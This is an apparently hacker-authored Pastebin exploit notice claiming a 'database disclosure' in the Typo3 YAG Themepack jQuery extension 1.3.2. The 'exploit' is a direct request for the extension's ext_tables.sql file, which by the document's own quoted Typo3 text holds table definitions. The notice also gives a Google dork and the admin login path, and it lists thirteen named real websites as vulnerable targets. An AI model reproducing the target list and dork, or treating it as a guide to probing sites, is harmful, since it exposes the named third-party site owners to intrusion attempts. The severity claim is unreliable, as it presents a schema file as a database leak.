KingSkrupellos

Typo3 YAG Themepack jQuery Extension 1.3.2 Database Disc

Jan 5th, 2019
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.63 KB | None | 0 0
  1. ################################################################################
  2.  
  3. # Exploit Title : Typo3 CMS YAG Themepack jQuery Extension 1.3.2 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 02/01/2019
  6. # Vendor Homepage : typo3.org ~ yag-gallery.de
  7. # Software Download Link : extensions.typo3.org/extension/download/yag_themepack_jquery/1.3.2/zip/
  8. + github.com/YAG-Gallery/yag_themepack_jquery/archive/master.zip
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : 1.3.2
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/typo3conf/ext/yag_themepack_jquery/''
  14. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  15. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  16. # CxSecurity Exploit Reference Link :
  17. cxsecurity.com/issue/WLB-2019010030
  18. # PacketStormSecurity Exploit Reference Link :
  19. packetstormsecurity.com/files/150986/Typo3-CMS-YAG-Themepack-jQuery-1.3.2-Database-Disclosure.html
  20.  
  21. ################################################################################
  22.  
  23. # Admin Panel Login Path :
  24.  
  25. /typo3/index.php
  26.  
  27. # Exploit :
  28.  
  29. /typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  30.  
  31. ################################################################################
  32.  
  33. Information About Database =>
  34.  
  35. ext_tables.sql (optional)
  36. ************************
  37.  
  38. This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
  39.  
  40. This file should contain a table structure dump of the tables used by the extension.
  41.  
  42. It is used for evaluation of the database structure and is therefore important to check and update
  43.  
  44. the database when an extension is enabled. If you add additional fields (or depend on certain fields)
  45.  
  46. to existing tables, you can also put them here. In that case, insert a CREATE TABLE structure
  47.  
  48. for that table, but remove all lines except the ones defining the fields you need. The ext_tables.sql
  49.  
  50. file may not necessarily be dumpable directly to MySQL (because of the semi-complete
  51.  
  52. table definitions allowed defining only required fields.). But the EM or
  53.  
  54. Install Tool can handle this. The only very important thing is that the syntax of the content
  55.  
  56. is exactly like MySQL made it so that the parsing and analysis routines of the EM don't get confused.
  57.  
  58. ################################################################################
  59.  
  60. # Example Vulnerable Sites =>
  61.  
  62. [+] joyce-meyer.nl/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  63.  
  64. [+] schleef.info/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  65.  
  66. [+] jagdcom.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  67.  
  68. [+] players4players.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  69.  
  70. [+] gemeinde-gaiberg.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  71.  
  72. [+] tischfussball-em2008.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  73.  
  74. [+] zagro.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  75.  
  76. [+] joyce-meyer.nl/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  77.  
  78. [+] gmeinder-lokomotiven.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  79.  
  80. [+] plastipol.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  81.  
  82. [+] provincia.livorno.it/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  83.  
  84. [+] demo.szene-rostock.de/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  85.  
  86. [+] cherninki.com/typo3conf/ext/yag_themepack_jquery/ext_tables.sql
  87.  
  88. ################################################################################
  89.  
  90. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  91.  
  92. ################################################################################
Advertisement
Add Comment
Please, Sign In to add comment